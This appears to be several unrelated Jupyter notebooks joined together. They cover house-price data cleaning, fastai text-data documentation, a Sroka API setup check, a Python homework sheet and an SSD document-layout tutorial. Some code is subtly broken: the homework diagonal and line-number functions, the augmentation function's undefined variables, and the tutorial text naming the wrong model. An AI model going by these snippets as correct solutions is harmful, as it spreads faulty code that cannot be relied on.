df['broker'] = np.where(df['broker'].str.contains("Svensk Fastighetsförmedling"), "Svensk Fastighetsförmedling", df['broker'])
df['broker'] = np.where(df['broker'].str.contains("Länsförsäkringar Fastighetsförmedling"), "Länsförsäkringar Fastighetsförmedling", df['broker'])
df['broker'] = np.where(df['broker'].str.contains("SkandiaMäklarna"), "SkandiaMäklarna", df['broker'])
df['broker'] = np.where(df['broker'].str.contains("ERA"), "ERA", df['broker'])
df['broker'] = np.where(df['broker'].str.contains("Mäklarringen"), "Mäklarringen", df['broker'])
df['broker'] = np.where(df['broker'].str.contains("Fastighetsmäklarna"), "Fastighetsmäklarna", df['broker'])
df.broker.value_counts()
df['sup_area'] = np.where(df['sup_area'].isnull(), 0, df['sup_area'])
df['monthly_fee'] = np.where(df['monthly_fee'].isnull(), 0, df['monthly_fee'])
df['price_change_pct'] = np.where(df['price_change_pct'].isnull(), 0, df['price_change_pct'])
df['land_area'] = np.where(df['land_area'].isnull(), 0, df['land_area'])
df
df.isnull().sum()
print(df.count())
df = df[df.address.isnull() == False]
df = df[df.area.isnull() == False]
df[df.rooms.isnull()]
df_copy = df.copy()
df_copy = df_copy[df_copy.rooms.isnull() == False]
df_copy['area_per_room'] = df_copy['area']/df_copy['rooms']
print(np.round(df_copy.area_per_room.mean(),0))
df['rooms'] = np.where(df['rooms'].isnull(), np.round(df['area']/25, 0), df['rooms'])
df.isnull().sum()
df['total_area'] = df['area'] + df['sup_area']
df['price_per_sqm'] = df['price'] / df['area']
df['price_per_tsqm'] = df['price'] / df['total_area']
df['list_price'] = np.round((df['price'] * 100 / (100 + df['price_change_pct']))/1000, 0)*1000
df.head()
df.to_csv('houses_clean.csv',index=False)
df[df.address.str.contains('Marsgränd')]
df[df.address.str.contains('Merkurigränd')]
df[df.address.str.contains('Venusgränd')]
```
# Exploring
```
%matplotlib inline
import matplotlib.pyplot as plt
def scatter_vs_price(var):
data = pd.concat([df['price'], df[var]], axis=1)
data.plot.scatter(x=var, y='price', ylim=(0,25000000));
plt.show()
#show a scatterplot to see correlation
scatter_vs_price('area')
#area has missing values, drop all rows without area - too important
df = df.dropna(subset=['area'])
#outliers
plt.boxplot(df['area'], 0, 'rD')
plt.show()
#remove any rows with area above 450
df = df[df.area < 450]
scatter_vs_price('area')
```
## Sup area
```
#missing sup_are should have sup_area = 0
df['sup_area'].fillna(0, inplace=True)
scatter_vs_price('sup_area')
plt.boxplot(df['sup_area'], 0, 'rD')
plt.show()
df[df.sup_area > 200]
```
## Monthly fee
```
#missing listing_fee is normal - set to 0
df['monthly_fee'].fillna(0, inplace=True)
scatter_vs_price('monthly_fee')
df['is_condo'] = df['monthly_fee'].apply(lambda fee: 0 if fee == 0 else 1)
```
## Price change percent
```
#missing price_change_pct means no change = 0
df['price_change_pct'].fillna(0, inplace=True)
df = df[df.price_change_pct < 35]
scatter_vs_price('price_change_pct')
```
## Land area
```
#filling land_area with = seems legit
df['land_area'].fillna(0, inplace=True)
df = df[df.land_area < 2800]
scatter_vs_price('land_area')
```
## Rooms
```
scatter_vs_price('rooms')
df.columns
# ...and then we can look at that scatter plot
data = pd.concat([df['rooms'], df['total_area']], axis=1)
data.plot.scatter(x='total_area', y='rooms', ylim=(0,15))
plt.show()
df = df[df.total_area < 500]
df.count()
#we're done with the numerical values, let's check the histograms
df.hist()
plt.show()
```
# Categorical
## House type
```
df['house_type'].describe()
df.house_type.unique()
counts = df['house_type'].value_counts()
counts
fig, ax = plt.subplots()
df['house_type'].value_counts().plot(ax=ax, kind='bar')
plt.show()
```
## Region
```
df['region'].describe()
df.region.unique()
counts = df['region'].value_counts()
counts
```
# Feature Engineering
## Date Sold
```
df['date_sold'] = pd.to_datetime(df['date_sold'])
df['year'] = df['date_sold'].dt.year
df['month'] = df['date_sold'].dt.month
fig, ax = plt.subplots()
df['year'].value_counts().plot(ax=ax, kind='bar')
plt.show()
fig, ax = plt.subplots()
df['month'].value_counts().plot(ax=ax, kind='bar')
plt.show()
```
## Broker
```
df['broker'].describe()
counts = df['broker'].value_counts()
counts
fig, ax = plt.subplots()
df['broker'].value_counts().plot(ax=ax, kind='bar')
plt.show()
```
# Price
```
df['price'].describe()
```
move to kkr (thousands of crowns) to make it easier to read
```
df['price'] = df.apply(lambda row: row.price/1000, axis=1)
import seaborn as sns
#histogram
sns.distplot(df['price']);
plt.show()
plt.boxplot(df['price'], 0, 'rD')
plt.show()
df = df[df.price < 20000]
df.columns
df.to_csv('houses_clean.csv')
```
| github_jupyter |
## NLP datasets
```
from fastai.gen_doc.nbdoc import *
from fastai.text import *
from fastai.gen_doc.nbdoc import *
```
This module contains the [`TextDataset`](/text.data.html#TextDataset) class, which is the main dataset you should use for your NLP tasks. It automatically does the preprocessing steps described in [`text.transform`](/text.transform.html#text.transform). It also contains all the functions to quickly get a [`TextDataBunch`](/text.data.html#TextDataBunch) ready.
## Quickly assemble your data
You should get your data in one of the following formats to make the most of the fastai library and use one of the factory methods of one of the [`TextDataBunch`](/text.data.html#TextDataBunch) classes:
- raw text files in folders train, valid, test in an ImageNet style,
- a csv where some column(s) gives the label(s) and the following one the associated text,
- a dataframe structured the same way,
- tokens and labels arrays,
- ids, vocabulary (correspondence id to word) and labels.
If you are assembling the data for a language model, you should define your labels as always 0 to respect those formats. The first time you create a [`DataBunch`](/basic_data.html#DataBunch) with one of those functions, your data will be preprocessed automatically. You can save it, so that the next time you call it is almost instantaneous.
Below are the classes that help assembling the raw data in a [`DataBunch`](/basic_data.html#DataBunch) suitable for NLP.
```
show_doc(TextLMDataBunch, title_level=3)
```
All the texts in the [`datasets`](/datasets.html#datasets) are concatenated and the labels are ignored. Instead, the target is the next word in the sentence.
```
show_doc(TextLMDataBunch.create)
show_doc(TextClasDataBunch, title_level=3)
show_doc(TextClasDataBunch.create)
```
All the texts are grouped by length (with a bit of randomness for the training set) then padded so that the samples have the same length to get in a batch.
```
show_doc(TextDataBunch, title_level=3)
jekyll_warn("This class can only work directly if all the texts have the same length.")
```
### Factory methods (TextDataBunch)
All those classes have the following factory methods.
```
show_doc(TextDataBunch.from_folder)
```
The floders are scanned in `path` with a <code>train</code>, `valid` and maybe `test` folders. Text files in the <code>train</code> and `valid` folders should be places in subdirectories according to their classes (not applicable for a language model). `tokenizer` will be used to parse those texts into tokens.
You can pass a specific `vocab` for the numericalization step (if you are building a classifier from a language model you fine-tuned for instance). kwargs will be split between the [`TextDataset`](/text.data.html#TextDataset) function and to the class initialization, you can precise there parameters such as `max_vocab`, `chunksize`, `min_freq`, `n_labels` (see the [`TextDataset`](/text.data.html#TextDataset) documentation) or `bs`, `bptt` and `pad_idx` (see the sections LM data and classifier data).
```
show_doc(TextDataBunch.from_csv)
```
This method will look for `csv_name`, and optionally a `test` csv file, in `path`. These will be opened with [`header`](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.read_csv.html#pandas-read-csv), using `delimiter`. You can specify which are the `text_cols` and `label_cols`; by default a single label column is assumed to come before a single text column. If your csv has no header, you must specify these as indices. If you're training a language model and don't have labels, you must specify the `text_cols`. If there are several `text_cols`, the texts will be concatenated together with an optional field token. If there are several `label_cols`, the labels will be assumed to be one-hot encoded and `classes` will default to `label_cols` (you can ignore that argument for a language model). `label_delim` can be used to specify the separator between multiple labels in a column.
You can pass a `tokenizer` to be used to parse the texts into tokens and/or a specific `vocab` for the numericalization step (if you are building a classifier from a language model you fine-tuned for instance). Otherwise you can specify parameters such as `max_vocab`, `min_freq`, `chunksize` for the Tokenizer and Numericalizer (processors). Other parameters (e.g. `bs`, `val_bs` and `num_workers`, etc.) will be passed to [`LabelLists.databunch()`](/data_block.html#LabelLists.databunch) documentation) (see the LM data and classifier data sections for more info).
```
show_doc(TextDataBunch.from_df)
```
This method will use `train_df`, `valid_df` and optionally `test_df` to build the [`TextDataBunch`](/text.data.html#TextDataBunch) in `path`. You can specify `text_cols` and `label_cols`; by default a single label column comes before a single text column. If you're training a language model and don't have labels, you must specify the `text_cols`. If there are several `text_cols`, the texts will be concatenated together with an optional field token. If there are several `label_cols`, the labels will be assumed to be one-hot encoded and `classes` will default to `label_cols` (you can ignore that argument for a language model).
You can pass a `tokenizer` to be used to parse the texts into tokens and/or a specific `vocab` for the numericalization step (if you are building a classifier from a language model you fine-tuned for instance). Otherwise you can specify parameters such as `max_vocab`, `min_freq`, `chunksize` for the default Tokenizer and Numericalizer (processors). Other parameters (e.g. `bs`, `val_bs` and `num_workers`, etc.) will be passed to [`LabelLists.databunch()`](/data_block.html#LabelLists.databunch) documentation) (see the LM data and classifier data sections for more info).
```
show_doc(TextDataBunch.from_tokens)
```
This function will create a [`DataBunch`](/basic_data.html#DataBunch) from `trn_tok`, `trn_lbls`, `val_tok`, `val_lbls` and maybe `tst_tok`.
You can pass a specific `vocab` for the numericalization step (if you are building a classifier from a language model you fine-tuned for instance). kwargs will be split between the [`TextDataset`](/text.data.html#TextDataset) function and to the class initialization, you can precise there parameters such as `max_vocab`, `chunksize`, `min_freq`, `n_labels`, `tok_suff` and `lbl_suff` (see the [`TextDataset`](/text.data.html#TextDataset) documentation) or `bs`, `bptt` and `pad_idx` (see the sections LM data and classifier data).
```
show_doc(TextDataBunch.from_ids)
```
Texts are already preprocessed into `train_ids`, `train_lbls`, `valid_ids`, `valid_lbls` and maybe `test_ids`. You can specify the corresponding `classes` if applicable. You must specify a `path` and the `vocab` so that the [`RNNLearner`](/text.learner.html#RNNLearner) class can later infer the corresponding sizes in the model it will create. kwargs will be passed to the class initialization.
### Load and save
To avoid losing time preprocessing the text data more than once, you should save and load your [`TextDataBunch`](/text.data.html#TextDataBunch) using [`DataBunch.save`](/basic_data.html#DataBunch.save) and [`load_data`](/basic_data.html#load_data).
```
show_doc(TextDataBunch.load)
jekyll_warn("This method should only be used to load back `TextDataBunch` saved in v1.0.43 or before, it is now deprecated.")
```
### Example
Untar the IMDB sample dataset if not already done:
```
path = untar_data(URLs.IMDB_SAMPLE)
path
```
Since it comes in the form of csv files, we will use the corresponding `text_data` method. Here is an overview of what your file you should look like:
```
pd.read_csv(path/'texts.csv').head()
```
And here is a simple way of creating your [`DataBunch`](/basic_data.html#DataBunch) for language modelling or classification.
```
data_lm = TextLMDataBunch.from_csv(Path(path), 'texts.csv')
data_clas = TextClasDataBunch.from_csv(Path(path), 'texts.csv')
```
## The TextList input classes
Behind the scenes, the previous functions will create a training, validation and maybe test [`TextList`](/text.data.html#TextList) that will be tokenized and numericalized (if needed) using [`PreProcessor`](/data_block.html#PreProcessor).
```
show_doc(Text, title_level=3)
show_doc(TextList, title_level=3)
```
`vocab` contains the correspondence between ids and tokens, `pad_idx` is the id used for padding. You can pass a custom `processor` in the `kwargs` to change the defaults for tokenization or numericalization. It should have the following form:
```
tokenizer = Tokenizer(SpacyTokenizer, 'en')
processor = [TokenizeProcessor(tokenizer=tokenizer), NumericalizeProcessor(max_vocab=30000)]
```
See below for all the arguments those tokenizers can take.
```
show_doc(TextList.label_for_lm)
show_doc(TextList.from_folder)
show_doc(TextList.show_xys)
show_doc(TextList.show_xyzs)
show_doc(OpenFileProcessor, title_level=3)
show_doc(open_text)
show_doc(TokenizeProcessor, title_level=3)
```
`tokenizer` is used on bits of `chunksize`. If `mark_fields=True`, add field tokens between each parts of the texts (given when the texts are read in several columns of a dataframe). See more about tokenizers in the [transform documentation](/text.transform.html).
```
show_doc(NumericalizeProcessor, title_level=3)
```
Uses `vocab` for this (if not None), otherwise create one with `max_vocab` and `min_freq` from tokens.
## Language Model data
A language model is trained to guess what the next word is inside a flow of words. We don't feed it the different texts separately but concatenate them all together in a big array. To create the batches, we split this array into `bs` chunks of continuous texts. Note that in all NLP tasks, we don't use the usual convention of sequence length being the first dimension so batch size is the first dimension and sequence length is the second. Here you can read the chunks of texts in lines.
```
path = untar_data(URLs.IMDB_SAMPLE)
data = TextLMDataBunch.from_csv(path, 'texts.csv')
x,y = next(iter(data.train_dl))
example = x[:15,:15].cpu()
texts = pd.DataFrame([data.train_ds.vocab.textify(l).split(' ') for l in example])
texts
jekyll_warn("If you are used to another convention, beware! fastai always uses batch as a first dimension, even in NLP.")
```
This is all done internally when we use [`TextLMDataBunch`](/text.data.html#TextLMDataBunch), by wrapping the dataset in the following pre-loader before calling a [`DataLoader`](https://pytorch.org/docs/stable/data.html#torch.utils.data.DataLoader).
```
show_doc(LanguageModelPreLoader)
```
LanguageModelPreLoader is an internal class uses for training a language model. It takes the sentences passed as a jagged array of numericalised sentences in `dataset` and returns contiguous batches to the pytorch dataloader with batch size `bs` and a sequence length `bptt`.
- `lengths` can be provided for the jagged training data else lengths is calculated internally
- `backwards=True` will reverses the sentences.
- `shuffle=True`, will shuffle the order of the sentences, at the start of each epoch - except the first
The following description is usefull for understanding the implementation of [`LanguageModelPreLoader`](/text.data.html#LanguageModelPreLoader):
- idx: instance of CircularIndex that indexes items while taking the following into account 1) shuffle, 2) direction of indexing, 3) wraps around to head (reading forward) or tail (reading backwards) of the ragged array as needed in order to fill the last batch(s)
- ro: index of the first rag of each row in the batch to be extract. Returns as index to the next rag to be extracted
- ri: Reading forward: index to the first token to be extracted in the current rag (ro). Reading backwards: one position after the last token to be extracted in the rag
- overlap: overlap between batches is 1, because we only predict the next token
## Classifier data
When preparing the data for a classifier, we keep the different texts separate, which poses another challenge for the creation of batches: since they don't all have the same length, we can't easily collate them together in batches. To help with this we use two different techniques:
- padding: each text is padded with the `PAD` token to get all the ones we picked to the same size
- sorting the texts (ish): to avoid having together a very long text with a very short one (which would then have a lot of `PAD` tokens), we regroup the texts by order of length. For the training set, we still add some randomness to avoid showing the same batches at every step of the training.
Here is an example of batch with padding (the padding index is 1, and the padding is applied before the sentences start).
```
path = untar_data(URLs.IMDB_SAMPLE)
data = TextClasDataBunch.from_csv(path, 'texts.csv')
iter_dl = iter(data.train_dl)
_ = next(iter_dl)
x,y = next(iter_dl)
x[-10:,:20]
```
This is all done internally when we use [`TextClasDataBunch`](/text.data.html#TextClasDataBunch), by using the following classes:
```
show_doc(SortSampler)
```
This pytorch [`Sampler`](https://pytorch.org/docs/stable/data.html#torch.utils.data.Sampler) is used for the validation and (if applicable) the test set.
```
show_doc(SortishSampler)
```
This pytorch [`Sampler`](https://pytorch.org/docs/stable/data.html#torch.utils.data.Sampler) is generally used for the training set.
```
show_doc(pad_collate)
```
This will collate the `samples` in batches while adding padding with `pad_idx`. If `pad_first=True`, padding is applied at the beginning (before the sentence starts) otherwise it's applied at the end.
## Undocumented Methods - Methods moved below this line will intentionally be hidden
```
show_doc(TextList.new)
show_doc(TextList.get)
show_doc(TokenizeProcessor.process_one)
show_doc(TokenizeProcessor.process)
show_doc(OpenFileProcessor.process_one)
show_doc(NumericalizeProcessor.process)
show_doc(NumericalizeProcessor.process_one)
show_doc(TextList.reconstruct)
show_doc(LanguageModelPreLoader.on_epoch_begin)
show_doc(LanguageModelPreLoader.on_epoch_end)
```
## New Methods - Please document or move to the undocumented section
```
show_doc(LMLabelList)
show_doc(LanguageModelPreLoader.allocate_buffers)
show_doc(LanguageModelPreLoader.CircularIndex.shuffle)
show_doc(LanguageModelPreLoader.fill_row)
```
| github_jupyter |
## Test your Sroka set up
The purpose of this notebook is to check whether you are able to connect with given API's that Sroka provides and that your credentials are correctly saved in config.ini file.
Where it is possible, we have provided a generic query, however some API's require to pass id's in order to get any results. In that case please define the variables' values first.
```
# GA API
from sroka.api.ga.ga import ga_request
# GAM API
from sroka.api.google_ad_manager.gam_api import get_data_from_admanager
# Qubole API (first of the options)
from sroka.api.qubole.query_result_file import get
# Qubole API (second of the options)
from sroka.api.qubole.qubole_api import done_qubole, request_qubole
# MOAT API
from sroka.api.moat.moat_api import get_data_from_moat
# Rubicon API
from sroka.api.rubicon.rubicon_api import get_data_from_rubicon
# Athena API
from sroka.api.athena.athena_api import query_athena, done_athena
# Google sheets API
from sroka.api.google_drive.google_drive_api import google_drive_sheets_read, \
google_drive_sheets_create, google_drive_sheets_write, google_drive_sheets_upload
# S3 API
from sroka.api.s3_connection.s3_connection_api import s3_download_data
```
## Athena
```
df = query_athena("""
SELECT '2019-03-01' as date
""")
df
```
## S3
```
# input a path to data on your s3, it is needed to perform any query
s3_folder = ''
s3_download_data('s3://{}'.format(s3_folder), prefix=True, sep=';')
```
## Google Ad Manager
```
start_day = '01'
end_day='04'
start_month = '03'
end_month = '03'
year = '2019'
query = ""
dimensions = ['DATE']
columns = ['TOTAL_ACTIVE_VIEW_MEASURABLE_IMPRESSIONS',
'TOTAL_ACTIVE_VIEW_VIEWABLE_IMPRESSIONS']
start_date = {'year': year,
'month': start_month,
'day': start_day}
stop_date = {'year': year,
'month': end_month,
'day': end_day}
df_gam = get_data_from_admanager(query, dimensions, columns, start_date, stop_date)
df_gam.head()
```
## Google Analytics
```
# your account id, it is needed to perform any query
your_id = ''
request = {
"ids" : "ga:{}".format(your_id),
"start_date" : "2019-03-01",
"end_date" : "2019-03-04",
"metrics" : "ga:pageviews",
"filters" : "ga:country==Poland",
"segment" : "",
"dimensions" : "ga:day"
}
df_ga = ga_request(request, print_sample_size=True, sampling_level='FASTER')
df_ga.head()
```
## Google Sheets
```
new_sheet = google_drive_sheets_create('new_sheet')
google_drive_sheets_write(df, new_sheet)
```
## Moat
```
input_data_moat = {
'start' : '20190301',
'end' : '20190304',
'columns' : ['date','impressions_analyzed']
}
df_moat = get_data_from_moat(input_data_moat, 'moat')
df_moat.head()
```
## Qubole
```
presto_query = """
SELECT '2019-03-01' as date;
"""
data_presto = request_qubole(presto_query, query_type='hive')
data_presto.head()
```
## Rubicon
```
input_data = {
'start' : '2018-08-23T00:00:00-07:00',
'end' : '2018-08-23T23:59:59-07:00',
'dimensions' : ['date', 'advertiser'],
'metrics' : ['paid_impression',
'starts',
'completes'
],
'filters' : ['dimension:country_id==PL'
]
}
data = get_data_from_rubicon(input_data)
data.head()
```
| github_jupyter |
This file should be completed before the *beginning* of class on Saturday Feb 17th.
Open book, open notes, open internet!
```
## Write each function below according to the docstring.
def max_lists(list1, list2):
"""
list1 and list2 have the same length.
Return a list which contains, for each index,
the maximum element of both list at this index.
Parameters
----------
list1 : {list} of numeric values
list2 : {list} of numeric values
Returns
-------
{list} : list of maximum values for each index of list1,list2
Example
-------
>>> max_lists([1, 4, 8], [3, 1, 9])
[3, 4, 9]
>>> max_lists([5, 7, 2, 3, 6], [3, 9, 1, 2, 8])
[5, 9, 2, 3, 8]
"""
# long version
ret = []
for pair in list(zip(list1, list2)):
ret.append(max(pair))
return ret
def max_list_v1(list1, list2):
return [max(pair) for pair in list(zip(list1, list2))]
def max_list_v2(list1, list2):
for list1_pair in enumerate(list1):
yield max(list2[list1_pair[0]], list1_pair[1])
v = max_lists([1, 4, 8], [3, 1, 9])
print(v)
v1 = max_list_v1([1, 4, 8], [3, 1, 9])
print(v1)
v2 = max_list_v2([1, 4, 8], [3, 1, 9])
print(list(v2))
def get_diagonal(mat):
"""
Given a matrix encoded as a 2 dimensional python list, return a list
containing all the values in the diagonal starting at the index 0, 0.
Parameters
----------
mat : 2 dimensional list ({list} of {list} of numeric values)
Returns
-------
{list} : values in the diagonal
Example
-------
E.g.
mat = [[1, 2], [3, 4], [5, 6]]
| 1 2 |
| 3 4 |
| 5 6 |
get_diagonal(mat) => [1, 4]
You may assume that the matrix is nonempty.
>>> get_diagonal([[1, 2], [3, 4], [5, 6]])
[1, 4]
"""
max_i = max(len(mat), len(mat[0]))-1
ret = list()
for x in range(max_i):
ret.append(mat[x][x])
return ret
gd = get_diagonal([[1, 2], [3, 4], [5, 6]])
print(gd)
def merge_dictionaries(d1, d2):
"""
Return a new dictionary which contains all the keys from d1 and d2 with
their associated values. If a key is in both dictionaries, the value should
be the sum of the two values.
Parameters
----------
d1 : {dict}
d2 : {dict}
Returns
-------
{dict} : values in the diagonal
Example
-------
>>> d1 = {"a": 1, "b": 5, "c": 1, "e": 8}
>>> d2 = {"b": 2, "c": 5, "d": 10, "f": 6}
>>> merge_dictionaries(d1,d2) == {"a": 1, "b": 7, "c": 6, "d": 10, "e": 8, "f": 6}
True
"""
keys = set(list(d1.keys()) + list(d2.keys()))
ret = {}
for key in keys:
ret[key] = d1.get(key,0) + d2.get(key,0)
return ret
d1 = {"a": 1, "b": 5, "c": 1, "e": 8}
d2 = {"b": 2, "c": 5, "d": 10, "f": 6}
merge_dictionaries(d1,d2) == {"a": 1, "b": 7, "c": 6, "d": 10, "e": 8, "f": 6}
print(d1)
def make_char_dict(filename):
"""
Given a file containing rows of text, create a dictionary with keys
of single characters. The value is a list of all the line numbers which
start with that letter. The first line should have line number 1.
Characters which never are the first letter of a line do not need to be
included in your dictionary.
Parameters
----------
filename : {string} indicating path to file
Returns
-------
{dict} : keys are {str} and values are {list}
Example
-------
>>> result = make_char_dict('data/people.txt')
>>> result['j']
[2, 19, 20]
>>> result['g']
[3]
"""
ret = {}
with open(filename) as f:
for linepair in enumerate(f):
c = linepair[1][0]
if c.isalpha():
ret.setdefault(c,[]).append(linepair[0])
return ret
result = make_char_dict('data/people.txt')
print(result)
```
| github_jupyter |
<a href="https://colab.research.google.com/github/Tessellate-Imaging/Monk_Object_Detection/blob/master/application_model_zoo/Example%20-%20Document%20Layout%20Analysis%20(SSD512).ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# Document Layout Analysis Using SSD
## About the network:
1. Paper on SSD: https://arxiv.org/abs/1512.02325
2. Blog-1 on SSD: https://towardsdatascience.com/review-ssd-single-shot-detector-object-detection-851a94607d11
3. Blog-2 on SSD: https://medium.com/@jonathan_hui/ssd-object-detection-single-shot-multibox-detector-for-real-time-processing-9bd8deac0e06
# Table of Contents
### 1. Installation Instructions
### 2. Use trained Model for Document Layout Analysis
### 3. How to train using PRImA Layout Analysis Dataset
## MXRCNN pipeline of Monk Object Detection Library has been used for implementing this model.
- After some comparisons, it was found out that VGG16 performs better than ResNet101 for object detection task using FasterRCNN, so VGG16 is chosen for the backend. Firstly, the dataset was converted from Monk Format to COCO Format.
- The model was trained for 3 epochs with learning rate of 0.005 and then for 3 more epochs with learning rate of 0.001. The image was preprocessed to smaller size (min 300px, max 500px) and normalsied using mean and standard deviation calculated in preprocessing notebook.
- Batch size has been kept at 2 because more than that was causing CUDAOutOfMemory error. It achieved RPN Accuracy=0.807714 and RCNN Accuracy= 0.750662.
# Installation
- Run these commands
- git clone https://github.com/Tessellate-Imaging/Monk_Object_Detection.git
- cd Monk_Object_Detection/1_gluoncv_finetune/installation
- Select the right requirements file and run
- cat requirements_cuda10.1.txt | xargs -n 1 -L 1 pip install
```
! git clone https://github.com/Tessellate-Imaging/Monk_Object_Detection.git
# For colab use the command below
#! cd Monk_Object_Detection/1_gluoncv_finetune/installation && cat requirements_colab.txt | xargs -n 1 -L 1 pip install
# For Local systems and cloud select the right CUDA version
!cd Monk_Object_Detection/1_gluoncv_finetune/installation && cat requirements_cuda10.1.txt | xargs -n 1 -L 1 pip install
```
# Use Already Trained Model for Demo
```
import os
import sys
sys.path.append("Monk_Object_Detection/1_gluoncv_finetune/lib/");
from inference_prototype import Infer
#Download trained model
! wget --load-cookies /tmp/cookies.txt "https://docs.google.com/uc?export=download&confirm=$(wget --save-cookies /tmp/cookies.txt --keep-session-cookies --no-check-certificate 'https://docs.google.com/uc?export=download&id=1E6T7RKGwy-v1MUxVJm-rxt5XcRyr2SQ7' -O- | sed -rn 's/.*confirm=([0-9A-Za-z_]+).*/\1\n/p')&id=1E6T7RKGwy-v1MUxVJm-rxt5XcRyr2SQ7" -O obj_dla_ssd512_trained.zip && rm -rf /tmp/cookies.txt
! unzip -qq obj_dla_ssd512_trained.zip
model_name = "ssd_512_vgg16_atrous_coco";
params_file = "dla_ssd512/dla_ssd512-vgg16.params";
class_list = ["paragraph", "heading", "credit", "footer", "drop-capital", "floating", "noise", "maths", "header", "caption", "image", "linedrawing", "graphics", "fname", "page-number", "chart", "separator", "table"];
gtf = Infer(model_name, params_file, class_list, use_gpu=True);
# download test images
! wget --load-cookies /tmp/cookies.txt "https://docs.google.com/uc?export=download&confirm=$(wget --save-cookies /tmp/cookies.txt --keep-session-cookies --no-check-certificate 'https://docs.google.com/uc?export=download&id=1VEkfJuicIr-STIqYOI-UruDDttWGXNxw' -O- | sed -rn 's/.*confirm=([0-9A-Za-z_]+).*/\1\n/p')&id=1VEkfJuicIr-STIqYOI-UruDDttWGXNxw" -O Test_Images.zip && rm -rf /tmp/cookies.txt
! unzip -qq Test_Images.zip
img_name = "Test_Images/test1.jpg";
visualize = True;
thresh = 0.3;
output = gtf.run(img_name, visualize=visualize, thresh=thresh);
img_name = "Test_Images/test2.jpg";
visualize = True;
thresh = 0.3;
output = gtf.run(img_name, visualize=visualize, thresh=thresh);
img_name = "Test_Images/test3.jpg";
visualize = True;
thresh = 0.4;
output = gtf.run(img_name, visualize=visualize, thresh=thresh);
```
# Train Your Own Model
## Dataset Credits
- https://www.primaresearch.org/datasets/Layout_Analysis
```
#Download Dataset
! wget --load-cookies /tmp/cookies.txt "https://docs.google.com/uc?export=download&confirm=$(wget --quiet --save-cookies /tmp/cookies.txt --keep-session-cookies --no-check-certificate 'https://docs.google.com/uc?export=download&id=1iBfafT1WHAtKAW0a1ifLzvW5f0ytm2i_' -O- | sed -rn 's/.*confirm=([0-9A-Za-z_]+).*/\1\n/p')&id=1iBfafT1WHAtKAW0a1ifLzvW5f0ytm2i_" -O PRImA_Layout_Analysis_Dataset.zip && rm -rf /tmp/cookies.txt
! unzip -qq PRImA_Layout_Analysis_Dataset.zip
```
# Data Preprocessing
### Library for Data Augmentation
Refer to https://github.com/albumentations-team/albumentations for more details
### Data Preprocessing
- Normalisation: Calculated Mean & Standard deviation of training images (3 images taken out of dataset for inference) to feed into model for normalisation (used in FasterRCNN).
- Format Conversion: TIFF format was causing problems in data augmentation and training on TIFF images was more than 5x slower than JPEG format images because of their huge size. Therefore, TIFF images were converted to JPEG format images.
- Selective Data Augmentation: In the raw dataset 4750+ paragraph type objects and only 10-30 frames, graphics, etc. type objects which led to huge bias in dataset. To generate more data and to decrease bias, a customised function has been implemented from the scratch. This function produces random translational augmentated images of only those images which have minority classes in them. Using this function, the dataset size increased from 475 images to 1783 images. If data augmentation has been done on every image, there would have been 24000+ paragraphs in the dataset whereas there are 19568 now, which slightly improves the bias. (Exact numbers are in the data preprocessing notebook). The augmented images had to be saved in the dataset because augmentation function couldn't be called on the go.
- Conversion to VOC to Monk type- Coversion so that Monk format can be later used in SSD Model, converted to yolo type for Yolo model, and COCO format for FasterRCNN Model.
```
! pip install albumentations
import os
import sys
import cv2
import numpy as np
import pandas as pd
from PIL import Image
import albumentations as A
import glob
import matplotlib.pyplot as plt
import xmltodict
import json
from tqdm.notebook import tqdm
from pycocotools.coco import COCO
root_dir = "PRImA Layout Analysis Dataset/";
img_dir = "Images/";
anno_dir = "XML/";
final_root_dir="Document_Layout_Analysis/" #Directory for jpeg and augmented images
if not os.path.exists(final_root_dir):
os.makedirs(final_root_dir)
if not os.path.exists(final_root_dir+img_dir):
os.makedirs(final_root_dir+img_dir)
```
## TIFF Image Format to JPEG Image Format
```
for name in glob.glob(root_dir+img_dir+'*.tif'):
im = Image.open(name)
name = str(name).rstrip(".tif")
name = str(name).lstrip(root_dir)
name = str(name).lstrip(img_dir)
im.save(final_root_dir+ img_dir+ name + '.jpg', 'JPEG')
```
# Format Conversion and Data Augmentation
As most part of a document is text, there were far more paragraphs in the dataset than there were other labels such as tables or graphs. To handle this huge bias in the dataset, we augmented only those document images which had one of these minority labels in them. For example, if the document only had paragraphs and images, then we didn’t augment it. But if it had tables, charts, graphs or any other minority label, we augmented that image by many folds. This process helped in reducing the bias in the dataset by around 25%. This selection and augmentation has been done during the format conversion from VOC to Monk Format.
## Given format- VOC Format
### Dataset Directory Structure
./PRImA Layout Analysis Dataset/ (root_dir)
|
|-----------Images (img_dir)
| |
| |------------------img1.jpg
| |------------------img2.jpg
| |------------------.........(and so on)
|
|
|-----------Annotations (anno_dir)
| |
| |------------------img1.xml
| |------------------img2.xml
| |------------------.........(and so on)
## Required Format- Monk Format
### Dataset Directory Structure
./Document_Layout_Analysis/ (final_root_dir)
|
|-----------Images (img_dir)
| |
| |------------------img1.jpg
| |------------------img2.jpg
| |------------------.........(and so on)
|
|
|-----------train_labels.csv (anno_file)
### Annotation file format
| Id | Labels |
| img1.jpg | x1 y1 x2 y2 label1 x1 y1 x2 y2 label2 |
- Labels: xmin ymin xmax ymax label
- xmin, ymin - top left corner of bounding box
- xmax, ymax - bottom right corner of bounding box
```
files = os.listdir(root_dir + anno_dir);
combined = [];
```
### Data Augmentation Function
```
def augmentData(fname, boxes):
image = cv2.imread(final_root_dir+img_dir+fname)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
transform = A.Compose([
A.IAAPerspective(p=0.7),
A.ShiftScaleRotate(shift_limit=0.1, scale_limit=0.1, rotate_limit=5, p=0.5),
A.IAAAdditiveGaussianNoise(),
A.ChannelShuffle(),
A.RandomBrightnessContrast(),
A.RGBShift(p=0.8),
A.HueSaturationValue(p=0.8)
], bbox_params=A.BboxParams(format='pascal_voc', min_visibility=0.2))
for i in range(1, 9):
label=""
transformed = transform(image=image, bboxes=boxes)
transformed_image = transformed['image']
transformed_bboxes = transformed['bboxes']
#print(transformed_bboxes)
flag=False
for box in transformed_bboxes:
x_min, y_min, x_max, y_max, class_name = box
if(xmax<=xmin or ymax<=ymin):
flag=True
break
label+= str(int(x_min))+' '+str(int(y_min))+' '+str(int(x_max))+' '+str(int(y_max))+' '+class_name+' '
if(flag):
continue
cv2.imwrite(final_root_dir+img_dir+str(i)+fname, transformed_image)
label=label[:-1]
combined.append([str(i) + fname, label])
```
# VOC to Monk Format Conversion
